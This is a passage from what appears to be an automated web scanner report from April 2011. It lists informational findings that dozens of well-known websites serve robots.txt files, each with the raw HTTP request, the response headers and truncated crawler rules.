Cache-Control: private, max-age=116354
Date: Sat, 02 Apr 2011 13:34:19 GMT
Content-Length: 308
Connection: close

User-agent: *
Disallow: /portal/site/mslo/
Disallow: /vgn-ext-templating/v/
Disallow: /nav/
Disallow: /users/
Disallow: /static_html/
Disallow: /ace/
Disallow: /|/
Disallow: /most-popular-results
Disa
...[SNIP]...
24.510. http://www.marykay.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marykay.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.marykay.com

Response

HTTP/1.1 200 OK
Content-Length: 695
Content-Type: text/plain
Last-Modified: Fri, 12 Feb 2010 15:34:34 GMT
Accept-Ranges: bytes
ETag: "a447d1e0f8abca1:a50fa"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=0DCD783041A90E3589652983111EFD79; Path=/; Domain=.marykay.com
Set-Cookie: TLTSID=0DCD783041A90E3589652983111EFD79; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Sat, 02 Apr 2011 14:18:37 GMT
Connection: close
Set-Cookie: www.marykay.com=1057692844.20480.0000; expires=Sat, 09-Apr-2011 14:18:37 GMT; path=/

# /robots.txt file for http://www.marykay.com/

User-agent: *
Disallow: /AddToBagRedirect.aspx
Disallow: /Customer404.aspx
Disallow: /CustomError.aspx
Disallow: /Gate.aspx
Disallow: /InTouchRed
...[SNIP]...
24.511. http://www.mastercard.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mastercard.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mastercard.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:06:27 GMT
Server: Apache
Last-Modified: Tue, 18 May 2010 21:03:04 GMT
ETag: "106c-aadb3200"
Accept-Ranges: bytes
Content-Length: 4204
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_xxx.nbtufsdbse.dpn-iuuq=ffffffff099ee93145525d5f4f58455e445a4a423660;expires=Sat, 02-Apr-2011 14:30:05 GMT;path=/;httponly

User-agent: *
Disallow: /cobrand/
Disallow: /cgi-bin/
Disallow: /cmsfiles/servlet/
Disallow: /businessplanning/financialresourceguide/
Disallow: /businessplanning/procurementoppguide/
Disallow:
...[SNIP]...
24.512. http://www.match.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.match.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.match.com

Response

HTTP/1.1 200 OK
Content-Length: 483
Content-Type: text/plain
Content-Location: http://www.match.com/robots.txt
Last-Modified: Thu, 24 Feb 2011 19:01:57 GMT
Accept-Ranges: bytes
ETag: "db94c4f55d4cb1:539"
Server: Microsoft-IIS/6.0
P3p: CP="NOI DSP COR NID CUR OUR NOR"
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 12:38:11 GMT
Connection: close

User-agent: *
Disallow: /tools
Disallow: /redalert
Disallow: /bin
Disallow: /html
Disallow: /keynote
Disallow: /profile/
Disallow: /photos/
Disallow: /quizzes/
Disallow: /profilesettings/
Di
...[SNIP]...
24.513. http://www.mate1.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mate1.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mate1.net

Response

HTTP/1.0 200 OK
Date: Fri, 01 Apr 2011 19:48:47 GMT
Server: Apache
P3P: policyref="http://www.mate1.com/p3p/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV COM"
Cache-Control: max-age=86400
Expires: Sat, 02 Apr 2011 19:48:47 GMT
Content-Type: text/plain
Age: 65624
Content-Length: 770
X-Cache: HIT from crtv4.mate1.com
Via: 1.1 crtv4.mate1.com:80 (squid/2.7.STABLE7)
Connection: close

User-agent: *
Disallow: /ad/
Disallow: /edate/
Disallow: /admin/
Disallow: /affiliates/
Disallow: /ambassadors/
Disallow: /c/
Disallow: /cj/
Disallow: /cj2/
Disallow: /crtv/
Disallow: /cj2/
Disallow:
...[SNIP]...
24.514. http://www.maxim.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.maxim.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.maxim.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.16 (Unix) mod_jk/1.2.28
Last-Modified: Wed, 03 Nov 2010 20:37:11 GMT
ETag: "240230f6-21-4942c0178abcf"
Accept-Ranges: bytes
Content-Length: 33
Content-Type: text/plain
Date: Sat, 02 Apr 2011 13:32:36 GMT
Connection: close

User-Agent: *
Disallow: /archive/
24.515. http://www.mayoclinic.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mayoclinic.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mayoclinic.com

Response

HTTP/1.1 200 OK
Content-Length: 2386
Content-Type: text/plain
Content-Location: http://www.mayoclinic.com/robots.txt
Last-Modified: Thu, 16 Apr 2009 21:00:40 GMT
Accept-Ranges: bytes
ETag: "20f46966d6bec91:6de"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:24:13 GMT
Connection: close

User-agent: *
Disallow: /images/billboardlarge/
Disallow: /images/billboardlargevertical/
Disallow: /images/billboards/
Disallow: /images/billboardSmall/
Disallow: /images/calculator/
Disallow:
...[SNIP]...
24.516. http://www.mcafee.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mcafee.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mcafee.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 07 Jan 2011 21:31:32 GMT
Accept-Ranges: bytes
ETag: "0128440b2aecb1:0"
Server: Microsoft-IIS/7.0
SN: SJV3
Date: Sat, 02 Apr 2011 13:43:28 GMT
Cache-Control: private, max-age=1800
Age: 0
Expires: Sat, 02 Apr 2011 14:13:28 GMT
x-cdn: Served by WebAcceleration
Connection: close

# directory exclusion used for mcafee.com
user-agent: *
#
#
# remove images
Disallow: /img/
Disallow: /*/img/
Disallow: /*/images/
#
# Disallow US expired files here (while waiting for region
...[SNIP]...
24.517. http://www.medcohealth.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.medcohealth.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.medcohealth.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:56:13 GMT
Last-Modified: Wed, 10 Sep 2003 18:34:08 GMT
Accept-Ranges: bytes
Content-Length: 2436
Connection: close
Content-Type: text/plain
Set-Cookie: TS2d8041=b73d5817b6cc284f76bfbf1a8510e0b602549166f7ba2baa4d972afd; Path=/

###############################
#
# robots.txt file for this www.medcohealth.com website
#
# addresses all robots by using wild card *
#
User-agent: *
#BEGIN List of JSPs under /consumer that needs to
...[SNIP]...
24.518. http://www.mediaite.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mediaite.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mediaite.com

Response

HTTP/1.0 200 OK
Date: Sat, 02 Apr 2011 14:18:47 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Vary: Cookie
Set-Cookie: PHPSESSID=sfh8ikbsmhbo3rh4se44t6chm7; path=/
Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/
Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/
X-Pingback: http://www.mediaite.com/xmlrpc.php
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Sitemap: http://www.mediaite.com/sitemap.xml.gz
24.519. http://www.medicalnewstoday.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.medicalnewstoday.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.medicalnewstoday.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:13:23 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Sat, 05 Mar 2011 11:17:11 GMT
ETag: "43003d-1f8-67651bc0"
Accept-Ranges: bytes
Content-Length: 504
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: Mediapartners-Google*
Disallow:

User-agent: Nutch
Crawl-delay: 5
Disallow:

User-agent: Slurp
Disallow: /*.gif$
Disallow: /*.jpg$

User-agent: *
Disallow: /images/
Disall
...[SNIP]...
24.520. http://www.medicare.gov/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.medicare.gov
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.medicare.gov

Response

HTTP/1.1 200 OK
Content-Length: 3222
Content-Type: text/plain
Last-Modified: Thu, 21 Oct 2010 01:45:29 GMT
Accept-Ranges: bytes
ETag: "20651da4c170cb1:778"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 14:04:15 GMT
Connection: close

# robots.txt for http://www.medicare.gov

User-agent: *
Disallow: /XODOutput/
Disallow: /Templates/
Disallow: /Stylesheets/
Disallow: /Library/
Disallow: /Images/
Disallow: /_ScriptLibrary/
D
...[SNIP]...
24.521. http://www.medscape.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.medscape.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.medscape.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:44:15 GMT
Server: Apache
Vary: Host
Last-Modified: Thu, 17 Dec 2009 18:37:15 GMT
ETag: "159f09-70-47af0e97f0cc0"
Accept-Ranges: bytes
Content-Length: 112
Keep-Alive: timeout=5, max=92
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_xxx-xfc.qsg.qiy1:80=e2413a273660;expires=Sat, 02-Apr-11 15:14:15 GMT;path=/

User-agent: *

Disallow: /viewarticle/*_print
Disallow: /viewprogram/*_pnt
Disallow: /druginfo/monoinfobyid*
24.522. http://www.meebo.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.meebo.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.meebo.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 02 Apr 2011 13:36:10 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 99
Last-Modified: Sat, 12 Mar 2011 00:10:18 GMT
Connection: close
Accept-Ranges: bytes

User-agent: *
Disallow: /httpstest.html
Disallow: /httpsokay.html
Disallow: /mcmd/
Disallow: /cmd/
24.523. http://www.meetlocals.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.meetlocals.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.meetlocals.com

Response

HTTP/1.1 200 OK
Server: Zeus/4.3
Date: Sat, 02 Apr 2011 13:26:39 GMT
Connection: close
Content-Length: 68
Accept-Ranges: bytes
Content-Type: text/plain
Last-Modified: Fri, 25 Mar 2011 17:26:11 GMT

User-agent: *
Allow: /
Disallow: /public/login2
Disallow: /members

24.524. http://www.meetup.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.meetup.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.meetup.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:39:20 GMT
Server: Apache-Coyote/1.1
ETag: W/"68-1296133100000"
Last-Modified: Thu, 27 Jan 2011 12:58:20 GMT
Content-Type: text/plain; charset=ISO-8859-1
Content-Length: 68
Vary: Accept-Encoding,User-Agent
Connection: close

Sitemap: http://www.meetup.com/sitemap.xml

User-agent: *
Disallow:
24.525. http://www.megaupload.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.megaupload.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.megaupload.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:37:26 GMT
Server: Apache
Last-Modified: Fri, 12 Jan 2007 01:57:26 GMT
ETag: "24"
Accept-Ranges: bytes
Content-Length: 36
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: ia_archiver
Disallow: /
24.526. http://www.menshealth.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.menshealth.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.menshealth.com

Response

HTTP/1.0 200 OK
Server: IBM_HTTP_Server
Last-Modified: Mon, 04 May 2009 16:53:36 GMT
ETag: "b2-d68400"
Content-Type: text/plain
Date: Sat, 02 Apr 2011 13:36:12 GMT
Content-Length: 178
Connection: close

User-agent: *
Disallow: /event.ng/
Disallow: /html.ng/
Disallow: /js.ng/
Disallow: /click.ng/
Disallow: /image.ng/
Disallow: /ping.ng/
Disallow: /mharchive/
24.527. http://www.menuism.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.menuism.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.menuism.com

Response

HTTP/1.1 200 OK
Server: nginx/0.6.35
Date: Sat, 02 Apr 2011 14:03:11 GMT
Content-Type: text/plain
Content-Length: 3645
Last-Modified: Tue, 15 Mar 2011 16:19:25 GMT
Connection: close
Accept-Ranges: bytes

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file

# robots we really don't want
User-agent: ia_archiver
User-agent: SlySearch
User-agent: turnitinbot
...[SNIP]...
24.528. http://www.menupages.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.menupages.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.menupages.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:56:12 GMT
Server: Apache
Cache-Control: max-age=300
Expires: Sat, 02 Apr 2011 14:01:12 GMT
Connection: close
Content-Type: text/plain
Vary: Accept-Encoding

#
# MenuPages.com: robots.txt
# Please, we do NOT allow nonauthorized robots.
#
# 1. A robot may not injure a human being or, through inaction, allow a
# human being to come to harm.
#
# 2. A r
...[SNIP]...
24.529. http://www.merchantcircle.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.merchantcircle.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.merchantcircle.com

Response

HTTP/1.0 200 OK
Connection: close
Expires: Sat, 02 Apr 2011 13:44:18 GMT
Cache-Control: max-age=3600
Content-Type: text/plain
ETag: "-6597865621079513402"
Accept-Ranges: bytes
Last-Modified: Thu, 31 Mar 2011 22:46:43 GMT
Content-Length: 4707
Date: Sat, 02 Apr 2011 12:44:18 GMT
Server: lighttpd/1.4.11

User-agent: Mediapartners-Google
Disallow: /ajax
Disallow: /ajax/
Disallow: /map
Disallow: /signup
Disallow: /auth
Disallow: /merchant
Disallow: /redirect
Disallow: /ads
Disallow: /profile
Disallow: /
...[SNIP]...
24.530. http://www.merck.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.merck.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.merck.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:59:17 GMT
Server: Apache
Set-Cookie: unique_visitor=173.193.214.243.1301752757223553; path=/; expires=Sun, 01-Apr-12 13:59:17 GMT
Last-Modified: Tue, 22 Jun 2010 18:50:13 GMT
ETag: "a0a244-1f9-e4318340"
Accept-Ranges: bytes
Content-Length: 505
P3P: policyref="http://www.merck.com/w3c/p3p.xml",CP="CAO DSP COR CURa ADMa DEVa TAIo PSAo PSDo IVAo IVDo CONo TELo OUR DELa LEG PHY ONL UNI COM NAV INT DEM STA HEA PRE LOC"
Connection: close
Content-Type: text/plain
Set-Cookie: BIGipServerwww.merck.com-HTTP=42209452.20480.0000; path=/

User-Agent: *
Disallow: /htbin/
Disallow: /includes/
Disallow: /css/
Disallow: /images/
Disallow: /websearch.html
Disallow: /hcp/adverse_experience/
Disallow: /message
Disallow: /policy/tax_ex
...[SNIP]...
24.531. http://www.mercola.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mercola.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mercola.com

Response

HTTP/1.0 200 OK
Content-Length: 571
Content-Type: text/plain
Last-Modified: Tue, 20 Jul 2010 07:52:29 GMT
Accept-Ranges: bytes
ETag: "82af9980e027cb1:769f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 14:05:07 GMT
Connection: close

User-agent: *
Sitemap: http://www.mercola.com/sitemap.xml
Disallow: /fcgi/pf/
Disallow: /display/PrintPage
Disallow: /pf/
Disallow: /LT/
Disallow: /wkst/
Disallow: /CMSHelp/
Disallow: /CMSForu
...[SNIP]...
24.532. http://www.metacafe.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.metacafe.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.metacafe.com

Response

HTTP/1.0 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/plain
Date: Sat, 02 Apr 2011 13:23:04 GMT
Content-Length: 1146
Connection: close
Set-Cookie: PHPSESSID=fe63cbcae5bca106cd4010e842f98f5e; path=/; domain=.metacafe.com
Set-Cookie: User=%7B%22sc%22%3A1%2C%22visitID%22%3A%22eceae43e1ecf18e9cebf605296cea604%22%2C%22LEID%22%3A40%2C%22LangID%22%3A%22en%22%2C%22npUserLocations%22%3A%5B244%5D%2C%22npUserLanguages%22%3A%5B0%2C9%5D%2C%22ffilter%22%3Atrue%7D; expires=Thu, 31-Mar-2016 13:23:04 GMT; path=/; domain=.metacafe.com
Set-Cookie: dsavip=1555042476.20480.0000; expires=Sat, 02-Apr-2011 14:23:04 GMT; path=/

User-agent: *
Disallow: /account/
Disallow: /bourne/mashup/?id=
Disallow: /bourne/mixer/?id=
Disallow: /disclaimer
Disallow: /f/
Disallow: /family_filter
Disallow: /fplayer.php
Disallow: /invi
...[SNIP]...
24.533. http://www.metafilter.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.metafilter.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.metafilter.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:42:46 GMT
Server: Apache
Last-Modified: Tue, 22 Feb 2011 22:37:56 GMT
ETag: "a000000048ae8-7ec-49ce6a1b362a6"
Accept-Ranges: bytes
Content-Length: 2028
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

#
# robots txt v. 1.08 Feb 22 2011 (googlebot changes)
# robots txt v. 1.07 Aug 04 2010 (008 disallow)
# robots txt v. 1.06 Dec 22 2009 (yahoo pipes tags disallow, generic crawl-delay)
# robots.t
...[SNIP]...
24.534. http://www.metrolyrics.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.metrolyrics.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.metrolyrics.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
ETag: "44-4c99329e-0"
Last-Modified: Tue, 21 Sep 2010 22:33:02 GMT
Content-Type: text/plain
Content-Length: 68
Cache-Control: max-age=18683
Date: Sat, 02 Apr 2011 13:25:39 GMT
Connection: close

User-agent: *
Disallow: /images/lid/

User-agent: ccbot
Disallow: /
24.535. http://www.metromix.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.metromix.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.metromix.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:57:29 GMT
Server: Apache/2.2.4 (Unix) mod_ssl/2.2.4 OpenSSL/0.9.7a
Last-Modified: Wed, 30 Mar 2011 15:51:03 GMT
ETag: "3285b5-90-24d9e7c0"
Accept-Ranges: bytes
Content-Length: 144
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=8
Connection: Keep-Alive
Content-Type: text/plain

# See http://www.robotstxt.org/wc/norobots.html for documentation
User-agent: *
Disallow: /javascripts/
Disallow: /secure/
Disallow: /webtools/
24.536. http://www.metropcs.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.metropcs.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.metropcs.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: private
Content-Length: 80
Content-Type: text/plain
Last-Modified: Wed, 30 Mar 2011 21:30:20 GMT
Accept-Ranges: bytes
ETag: "03e79ab21efcb1:0"
Set-Cookie: ObSSOCookie=ZCF75OXJkwColRWqWXwMtNP8t8%2Fyz0bQI6Dojvh%2B8Htzkn28JIxoxxgbA1O%2Fux1t9nqPkRFQiInjFlBEPfsMFvi58fzco6LkDCgm%2B%2Bqn8ySjTkkhgWLoRY07pnvZ%2FRM0ZdDtE%2BunESvytRlfh%2BiH%2BoNXTT7DJmES4yokVRSAL6epeN59CVPjxUuXBUpH5uYt05L0Av3GKLoB1J8Z%2B%2FPPesDjTOSHP%2FmmHJVKrRBhLldM07Kn%2BKL1UGmVT53Q37fFnx2ceIHw4StxZsYFqiLI86w9O7%2Bpmra%2Bii%2FP9WNzNFz5ueOI1EgwgQkO3nGG00xT; httponly; path=/; domain=.metropcs.com;
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:51:34 GMT
Connection: close

User-agent: *
Disallow: /*.axd$
Disallow: /heartbeat.htm
Disallow: /query.asp
24.537. http://www.mgid.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mgid.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mgid.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Sat, 02 Apr 2011 13:31:37 GMT
Content-Type: text/plain
Connection: close
Content-Length: 203

User-agent: *
Disallow: /search/
Disallow: /redirect/
Disallow: /news/
Disallow: /rnews/

User-agent: Yandex
Disallow: /search/
Disallow: /redirect/
Disallow: /news/
Disallow: /rnews/
Host: marketgid.
...[SNIP]...
24.538. http://www.miamiherald.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.miamiherald.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.miamiherald.com

Response

HTTP/1.0 200 OK
Server: Apache/1.3.41
Last-Modified: Thu, 14 Oct 2010 19:33:30 GMT
ETag: "1f40f0d-454-4cb75b0a"
Content-Type: text/plain
Date: Sat, 02 Apr 2011 13:42:17 GMT
Content-Length: 1108
Connection: close

#last modified 1-06-10

User-agent: *
Disallow:/834 #email_templates
Disallow:/819 #errors
Disallow:/679 #Need To Map
Disallow:/585 #Services
Disallow:/829 #Orthodox Miami
Disallow:/1214 #Orthodox
...[SNIP]...
24.539. http://www.michaels.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.michaels.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.michaels.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:40:20 GMT
Server: Demandware eCommerce Server
Content-Length: 77
Cache-Control: public;max-age=56260
Expires: Sun, 03 Apr 2011 05:18:00 GMT
Last-Modified: Sat, 02 Apr 2011 05:18:00 GMT
Vary: Accept-Encoding
Accept-Ranges: bytes
Connection: close
Content-Type: text/plain

User-Agent: *
Allow: /

Sitemap: http://www.michaels.com/sitemap_index.xml
24.540. http://www.michigan.gov/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.michigan.gov
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.michigan.gov

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:32:48 GMT
Server: IBM_HTTP_Server
Last-Modified: Wed, 17 Mar 2010 14:28:12 GMT
ETag: "22b-16e-ec8ab700"
Accept-Ranges: bytes
Content-Length: 366
Cache-Control: public, max-age=86400
Connection: close
Content-Type: text/plain

# robots.txt for http://www.michigan.gov
User-agent: *
Disallow: /minewswire/
Disallow: /printerFriendly/
Disallow: /textonly/
Disallow: /rss/
Disallow: /wml/
Disallow: /emailthispage/
Disallow: /podc
...[SNIP]...
24.541. http://www.microsofttranslator.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.microsofttranslator.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.microsofttranslator.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 07 Feb 2011 20:04:05 GMT
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Vary: Accept-Encoding
Cache-Control: public, max-age=11014926
Date: Sat, 02 Apr 2011 13:26:56 GMT
Connection: close
Content-Length: 1698

User-agent: *
Disallow: /bmi/
Disallow: /BVFrame.aspx
Disallow: /BVSandbox.aspx
Disallow: /cashback/admin
Disallow: /cashback/go
Disallow: /challenge
Disallow: /community/forums/tags
Disallow:
...[SNIP]...
24.542. http://www.military.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.military.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.military.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:28:32 GMT
Server: Apache
Cache-Control: max-age=6000
Expires: Sat, 02 Apr 2011 15:08:32 GMT
Last-Modified: Mon, 29 Mar 2010 20:11:51 GMT
ETag: "8bc632-417-4bb10987"
Accept-Ranges: bytes
Content-Length: 1047
Content-Type: text/plain
Connection: close

User-agent: *
Disallow: /*wh=
Disallow: /*?col=
Disallow: /*esrc=
Disallow: http://www.military.com/ContentFiles/NEW%20_Retirement_HR_1588.htm
Disallow: http://www.military.com/Education/SchoolHe
...[SNIP]...
24.543. http://www.mindjolt.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mindjolt.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mindjolt.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:44:44 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 12 Feb 2009 11:15:06 GMT
ETag: "3600c2-57-462b6d51f2280"
Accept-Ranges: bytes
Content-Length: 87
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Allow: /

User-agent: Googlebot
Disallow: /*jsessionid
Disallow: /*mode=
24.544. http://www.miracleworkers.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.miracleworkers.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.miracleworkers.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/plain
Last-Modified: Wed, 16 Mar 2011 13:10:16 GMT
Accept-Ranges: bytes
ETag: "c834ed7ddbe3cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
X-PBY: BEARWEB56
Date: Sat, 02 Apr 2011 13:54:04 GMT
Connection: close
Content-Length: 5654

User-agent: Mediapartners-Google*
Disallow:

User-agent: Google*
Disallow: /Custom/
Disallow: /custom/
Disallow: /Partner/
Disallow: /partner/
Disallow: /PSA/
Disallow: /psa/
Disallow: /RTQ
...[SNIP]...
24.545. http://www.mlb.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mlb.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mlb.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:25:07 GMT
